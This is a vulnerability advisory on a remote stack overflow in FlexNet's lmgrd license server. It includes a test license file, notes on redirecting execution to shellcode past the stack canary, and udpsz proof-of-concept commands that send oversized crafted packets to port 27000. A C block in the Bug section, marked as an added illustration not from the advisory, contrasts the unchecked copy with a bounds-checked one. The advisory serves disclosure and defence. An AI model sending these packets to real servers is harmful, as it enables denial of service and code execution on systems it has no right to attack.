#######################################################################

                             Luigi Auriemma

Application:  FlexNet License Server Manager
              http://www.flexerasoftware.com/products/flexnet-publisher.htm
              http://www.globes.com/support/fnp_utilities_download.htm
Versions:     <= 11.9.1 and others earlier
              (this version number was written when I found the advisory
              many months/years ago)
Platforms:    AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris
Bug:          stack overflow in lmgrd
Exploitation: remote, versus server
Date:         found    26 Oct 2010
              fixed    26 Mar 2012
              advisory 13 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"FlexNet Publisher software licensing makes it easy for software vendors
and high-tech manufacturers to manage, secure, enhance, and grow market
share through flexible pricing, packaging, licensing, and protection of
their software and SaaS offerings."

#######################################################################

======
2) Bug
======

lmgrd is a license server manager listening on port 27000 and usually
running as a system service in the products of various vendors like IBM,
HP, Sybase, Citrix, VMware, SolidWorks and so on; it's simply the most
widespread license manager.
There is also another version of the license server, called lmadmin,
which includes a web interface and is NOT vulnerable, but it's not as
widespread as lmgrd.

The server is affected by a classical stack buffer overflow in the
function that copies the data received after the header into a buffer
smaller than the needed bytes.
On Windows the code execution takes place after the exception in
"REP MOVSD", bypassing the "stack canary" protection.
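As an added illustration (not lmgrd's code and not from the advisory), here is the copy shape the description above implies, beside the bounds check that closes it; the 20-byte header is the one the advisory gives, while BODY_MAX and the function names are assumptions.

```c
/* Added illustration, not lmgrd's code. Header size is the 20 bytes the
 * advisory states; BODY_MAX and the function names are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN  20     /* fixed header, per the advisory */
#define BODY_MAX 1024   /* assumed size of the stack buffer */

/* Vulnerable shape: the copy length comes from the packet size with no
 * bound and the destination is a fixed stack buffer, so a body longer than
 * BODY_MAX overruns it (on Windows inside memcpy's REP MOVSD). Never called. */
static void process_body_unchecked(const uint8_t *pkt, size_t len)
{
    uint8_t body[BODY_MAX];
    memcpy(body, pkt + HDR_LEN, len - HDR_LEN);   /* len unchecked */
}

/* Hardened shape: reject packets shorter than the header (len - HDR_LEN
 * would wrap) and bodies larger than the buffer before copying anything.
 * Returns the number of body bytes accepted, or -1 when rejected. */
static int process_body_checked(const uint8_t *pkt, size_t len)
{
    uint8_t body[BODY_MAX];
    if (pkt == NULL || len < HDR_LEN) return -1;   /* truncated header */
    size_t body_len = len - HDR_LEN;
    if (body_len > BODY_MAX) return -1;            /* would overflow body[] */
    memcpy(body, pkt + HDR_LEN, body_len);
    return (int)body_len;
}

/* Constructed sample packet: zeroed 20-byte header followed by 0x61 ('a')
 * filler, the byte udpsz sends in the advisory. Returns the verdict. */
static int demo(size_t total_len)
{
    static uint8_t pkt[0x10000];
    if (total_len > sizeof pkt) return -1;
    memset(pkt, 0x61, total_len);
    memset(pkt, 0, HDR_LEN < total_len ? HDR_LEN : total_len);
    return process_body_checked(pkt, total_len);
}

int main(void)
{
    (void)process_body_unchecked;          /* shown for comparison only */
    printf("%d\n", demo(HDR_LEN + 100));   /* 100: accepted */
    printf("%d\n", demo(0x4000));          /* -1: rejected */
    return 0;
}
```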
For example on this platform [ESP+8] points exactly at position 0x3718 of
our data, so we can place a jmp back there and execute the shellcode
placed before this position.

Running the software requires a license file, so for testing things
quickly create the folder c:\flexlm, put lmgrd.exe in it, then create the
file license.dat containing the following data and launch it (I suggest
using -z to launch it in the foreground):

SERVER this_host ANY
VENDOR SYBASE
# The Sybase Software Asset Management License Server will not start unless
# one valid license is present. The following license is not used but will
# allow the License Server to start in the absence of any other licenses.
# Once you have generated served licenses for this License Server at SPDC
# you should remove this license file.
#
INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \
    Inc." ISSUED=14-feb-2007 NOTICE="License to allow the SySAM \
    License Server to start in the absence of any other licenses." \
    SN=12727 SIGN2="075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \
    A310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \
    499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A"

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000

or the max

  udpsz -D -T -C "2f b7 1179 ffff 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0xffff

Note that the 8-bit value at offset 1 and the 16-bit one at offset 2 are
checksums calculated respectively on the 20-byte header and on the rest
of the data, so they must be set correctly in case of modifications to
the packet.

#######################################################################

======
4) Fix
======

Fixed.

#######################################################################